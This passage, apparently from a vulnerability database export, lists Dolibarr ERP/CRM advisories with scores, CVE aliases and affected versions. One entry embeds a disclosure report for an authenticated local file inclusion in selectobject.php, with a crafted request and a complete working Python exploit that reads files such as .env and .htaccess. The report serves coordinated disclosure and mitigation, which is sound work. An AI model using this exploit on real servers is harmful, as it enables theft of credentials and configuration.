SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/ |
|
|
| url |
https://vuldb.com/submit/799337 |
|
| 4 |
| reference_url |
https://vuldb.com/vuln/360858 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
4.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
5 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 2 |
| value |
5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 3 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 4 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
2.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/ |
|
|
| url |
https://vuldb.com/vuln/360858 |
|
| 5 |
| reference_url |
https://vuldb.com/vuln/360858/cti |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
4.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
5 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 2 |
| value |
5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 3 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 4 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
2.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/ |
|
|
| url |
https://vuldb.com/vuln/360858/cti |
|
| 6 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-7688, GHSA-rvwr-q5hj-wq7g
|
| risk_score |
2.2 |
| exploitability |
0.5 |
| weighted_severity |
4.5 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-srth-2stq-gyaq |
|
| 51 |
| url |
VCID-tmv2-39y8-f7f1 |
| vulnerability_id |
VCID-tmv2-39y8-f7f1 |
| summary |
Dolibarr vulnerable to Eval Injection
Dolibarr ERP & CRM <=15.0.3 are vulnerable to Eval injection. By default, any administrator can be added to the installation page of Dolibarr, and if successfully added, malicious code can be inserted into the database and then executed by eval. |
| references |
| 0 |
|
| 1 |
|
| 2 |
| reference_url |
https://github.com/youncyb/dolibarr-rce |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
9.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
CRITICAL |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/ |
|
|
| url |
https://github.com/youncyb/dolibarr-rce |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
|
| aliases |
CVE-2022-40871, GHSA-7cm4-vmf2-8wf2
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-tmv2-39y8-f7f1 |
|
| 52 |
| url |
VCID-tsbf-m4eq-gbgp |
| vulnerability_id |
VCID-tsbf-m4eq-gbgp |
| summary |
Dolibarr ERP CRM Code Injection vulnerability during installation
Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
6.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
|
| 2 |
| value |
MODERATE |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2024-29477, GHSA-p73x-rpgm-3v56
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
7.9 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-tsbf-m4eq-gbgp |
|
| 53 |
| url |
VCID-uzz6-3bze-mbez |
| vulnerability_id |
VCID-uzz6-3bze-mbez |
| summary |
SQL Injection vulnerability in Dolibarr allows remote attackers to execute arbitrary SQL commands via the `sortfield` parameter to `/accountancy/admin/accountmodel.php`, `/accountancy/admin/categories_list.php`, `/accountancy/admin/journals_list.php`, `/admin/dict.php`, `/admin/mails_templates.php`, or `/admin/website.php`. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-9019 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83961 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83982 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83986 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83983 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-9019 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-9019, GHSA-fff9-m6f6-q3mh
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-uzz6-3bze-mbez |
|
| 54 |
| url |
VCID-v5bc-wjmv-ubhx |
| vulnerability_id |
VCID-v5bc-wjmv-ubhx |
| summary |
Command Injection
The admin panel in Dolibarr might allow remote attackers to execute arbitrary commands by leveraging support for updating the antivirus command and parameters used to scan file uploads. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10092 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62613 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62658 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62668 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62659 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10092 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-10092, GHSA-6j62-m2vv-wc3m
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-v5bc-wjmv-ubhx |
|
| 55 |
| url |
VCID-v9g8-u2uq-7yff |
| vulnerability_id |
VCID-v9g8-u2uq-7yff |
| summary |
Improper Authorization in dolibarr/dolibarr
An Improper Authorization vulnerability exists in Dolibarr versions prior to version 15.0.0. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-3991 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16414 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16377 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16458 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16457 |
| published_at |
2026-06-06T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-3991 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
|
| aliases |
CVE-2021-3991, GHSA-wppr-j57c-8jpm
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-v9g8-u2uq-7yff |
|
| 56 |
| url |
VCID-vp4z-qpc7-uug1 |
| vulnerability_id |
VCID-vp4z-qpc7-uug1 |
| summary |
Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php
# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure
## Target
Dolibarr Core (Tested on version 22.0.4)
## Summary
A Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).
## Vulnerability Details
The vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.
- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.
- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.
This allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.
## Steps to Reproduce
- Log in to the Dolibarr instance with any user account (no specific permissions required).
- Intercept or manually forge a GET request to the following endpoint:
```
GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0
```
- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.
- *(Optional)* Run the attached Python PoC to automate the extraction:
```
python3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess
```
## Impact
An attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.
## Suggested Mitigation
- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.
- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.
- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.
## Disclosure Policy & Assistance
The reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.
Should any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.
Thank you for the time and commitment to securing Dolibarr.
Best Regards,
Vincent KHAYAT (cnf409)
## Video PoC
https://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844
## PoC Script
```python
#!/usr/bin/env python3
"""Dolibarr selectobject.php authenticated LFI PoC"""
import argparse
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# Markers used to tell a login page apart from an authenticated session page.
LOGIN_MARKERS = ("Login @", "Identifiant @")
LOGOUT_MARKERS = ("/user/logout.php", "Logout", "Mon tableau de bord")


def request(
    opener, base_url, method, path, params=None, data=None, timeout=15
):
    # Send one HTTP request through the cookie-aware opener and return (status, body).
    url = f"{base_url.rstrip('/')}{path}"
    if params:
        url = f"{url}?{urllib.parse.urlencode(params)}"
    payload = urllib.parse.urlencode(data).encode("utf-8") if data else None
    req = urllib.request.Request(url, method=method.upper(), data=payload)
    req.add_header("User-Agent", "dolibarr-lfi-poc/1.0-securitytest-for-dolibarr")
    req.add_header("Accept", "text/html,application/xhtml+xml")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")


def extract_login_token(page):
    # Pull the anti-CSRF token out of the login form or its meta tag.
    for pattern in (
        r'name=["\']token["\']\s+value=["\']([^"\']*)["\']',
        r'name=["\']anti-csrf-newtoken["\']\s+content=["\']([^"\']*)["\']',
    ):
        match = re.search(pattern, page, flags=re.IGNORECASE)
        if match:
            return match.group(1)
    return ""


def looks_authenticated(body):
    return any(marker in body for marker in LOGOUT_MARKERS)


def clean_included_output(body):
    # Keep only what precedes the PHP warning/fatal-error trailer.
    for marker in (
        "<br />\n<b>Warning",
        "<br />\r\n<b>Warning",
        "<br />\n<b>Fatal error",
        "<br />\r\n<b>Fatal error",
    ):
        pos = body.find(marker)
        if pos != -1:
            return body[:pos].rstrip()
    return body.rstrip()


def login(opener, base_url, username, password):
    code, login_page = request(opener, base_url, "GET", "/")
    if code >= 400:
        return False, f"HTTP {code} on login page"
    token = extract_login_token(login_page)
    code, after_login = request(
        opener,
        base_url,
        "POST",
        "/index.php?mainmenu=home",
        data={
            "token": token,
            "actionlogin": "login",
            "loginfunction": "loginfunction",
            "username": username,
            "password": password,
        },
    )
    if code >= 400:
        return False, f"HTTP {code} on login request"
    if looks_authenticated(after_login):
        return True, ""
    code, home = request(opener, base_url, "GET", "/index.php?mainmenu=home")
    if code < 400 and looks_authenticated(home):
        return True, ""
    return False, "Invalid username or password"


def read_file(opener, base_url, relative_path):
    status, body = request(
        opener,
        base_url,
        "GET",
        "/core/ajax/selectobject.php",
        params={
            "outjson": "0",
            "htmlname": "x",
            "objectdesc": f"A:{relative_path}:0",
        },
    )
    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):
        raise RuntimeError("Session expired or not authenticated")
    return status, body, clean_included_output(body)


def parse_args():
    parser = argparse.ArgumentParser(
        description="Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4)."
    )
    parser.add_argument(
        "--url",
        default="http://127.0.0.1:8080",
        help="Dolibarr base URL (default: http://127.0.0.1:8080)",
    )
    parser.add_argument("--username", required=True, help="Dolibarr username")
    parser.add_argument("--password", required=True, help="Dolibarr password")
    parser.add_argument(
        "--file",
        dest="target_file",
        required=True,
        help="Target file to read (e.g. conf/.htaccess).",
    )
    return parser.parse_args()


def print_result(path, status, raw, clean):
    print(f"\n[+] HTTP status: {status}")
    print(f"[+] Requested file: {path}")
    print("=" * 80)
    if clean:
        print(html.unescape(clean))
    else:
        print("(No readable output extracted)")
    print("=" * 80)
    if clean != raw.rstrip():
        print("[i] PHP warnings/fatal output were trimmed from display.")


def summarize_error_body(body, limit=1200):
    text = html.unescape(body).strip()
    if not text:
        return "(Empty response body)"
    if len(text) > limit:
        return text[:limit].rstrip() + "\n... [truncated]"
    return text


def main():
    args = parse_args()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar())
    )
    ok, reason = login(opener, args.url, args.username, args.password)
    if not ok:
        print(f"[!] {reason}")
        return 1
    print("[+] Login successful.")
    try:
        status, raw, clean = read_file(opener, args.url, args.target_file)
        if status >= 400:
            print(f"[!] HTTP {status} while reading target file.")
            print("=" * 80)
            print(summarize_error_body(raw))
            print("=" * 80)
            return 1
        print_result(args.target_file, status, raw, clean)
        return 0
    except Exception as exc:
        print(f"[!] Error: {exc}")
        return 1


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except KeyboardInterrupt:
        print("\nInterrupted.")
        raise SystemExit(130)
``` |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-34036, GHSA-2mfj-r695-5h9r
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vp4z-qpc7-uug1 |
|
| 57 |
| url |
VCID-vwxd-syyk-jueh |
| vulnerability_id |
VCID-vwxd-syyk-jueh |
| summary |
Dolibarr Improper Input Validation vulnerability
Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-4197, GHSA-r9cm-pw9j-3fpx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vwxd-syyk-jueh |
|
| 58 |
| url |
VCID-w7ww-nq62-e7b1 |
| vulnerability_id |
VCID-w7ww-nq62-e7b1 |
| summary |
Dolibarr ERP CRM vulnerable to remote code execution (RCE)
